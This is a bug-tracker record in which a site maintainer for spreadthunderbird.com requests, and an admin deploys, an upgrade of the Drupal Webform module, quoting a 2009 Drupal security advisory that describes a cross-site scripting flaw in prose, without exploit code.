Advisory ID: DRUPAL-SA-CONTRIB-2009-0322 WEBFORM

RESOLVED FIXED

Status

Websites Graveyard
spreadthunderbird.com
--
critical
RESOLVED FIXED
9 years ago
5 years ago

People

(Reporter: Paul Booker, Assigned: gozer)

Tracking

Details

(URL)

(Reporter)

Description

9 years ago
Hi Gozer,

Would you upgrade our disabled webform module on stage / production so that we can't turn on a module which is a moderately critical security risk. I'll then update our Wiki, thanks.

 * Advisory ID: DRUPAL-SA-CONTRIB-2009-032
 * Project: Webform (third-party module)
 * Versions: 5.x, 6.x
 * Date: 2009-June-03
 * Security risk: Moderately critical
 * Exploitable from: Remote
 * Vulnerability: Cross-site scripting

-------- DESCRIPTION ---------------------------------------------------------

The Webform module provides a node type which is typically used to enable
site visitors to fill in questionnaires, contact or request/registration
forms, surveys, polls, or other forms on a Drupal site. When displaying the
results of Webform submissions, the module does not properly filter user
entered data, leading to a cross-site scripting [1] (XSS) vulnerability on
sites with a specific configuration of input formats that would normally be
safe. Such an attack carried out against a sufficiently privileged user may
lead a malicious user to gain administrator access to the site.
-------- VERSIONS AFFECTED ---------------------------------------------------

 * Versions of Webform for Drupal 5.x prior to 5.x-2.7
 * Versions of Webform for Drupal 6.x prior to 6.x-2.7

Drupal core is not affected. If you do not use the contributed Webform
module, there is nothing you need to do.
-------- SOLUTION ------------------------------------------------------------

Install the latest version:
 * If you use Webform for Drupal 5.x, upgrade to Webform 5.x-2.7 [2].
 * If you use Webform for Drupal 6.x, upgrade to Webform 6.x-2.7 [3].

See also the Webform project page [4].
-------- REPORTED BY ---------------------------------------------------------

David Rothstein [5]
-------- FIXED BY ------------------------------------------------------------

Nathan Haug (quicksketch [6]), and David Rothstein [7] of the Drupal Security
Team [8]
(Reporter)

Updated

9 years ago
Severity: normal → major
(Reporter)

Updated

9 years ago
Severity: major → critical
Summary: DRUPAL-SA-CONTRIB-2009-032 Webform → Advisory ID: DRUPAL-SA-CONTRIB-2009-0322 Webform
(Reporter)

Comment 1

9 years ago
Can we push this through to stage / production, thanks
Summary: Advisory ID: DRUPAL-SA-CONTRIB-2009-0322 Webform → Advisory ID: DRUPAL-SA-CONTRIB-2009-0322 WEBFORM
(Reporter)

Updated

9 years ago
Assignee: nobody → gozer
(Assignee)

Comment 2

9 years ago
Build, packaged and updated in stage and production.

Please verify and close.
(Reporter)

Comment 3

9 years ago
Verified.

Thanks, Paul
(Reporter)

Updated

9 years ago
Status: NEW → RESOLVED
Last Resolved: 9 years ago
Resolution: --- → FIXED
Component: spreadthunderbird.com → spreadthunderbird.com
Product: Websites → Websites Graveyard
You need to log in before you can comment on or make changes to this bug.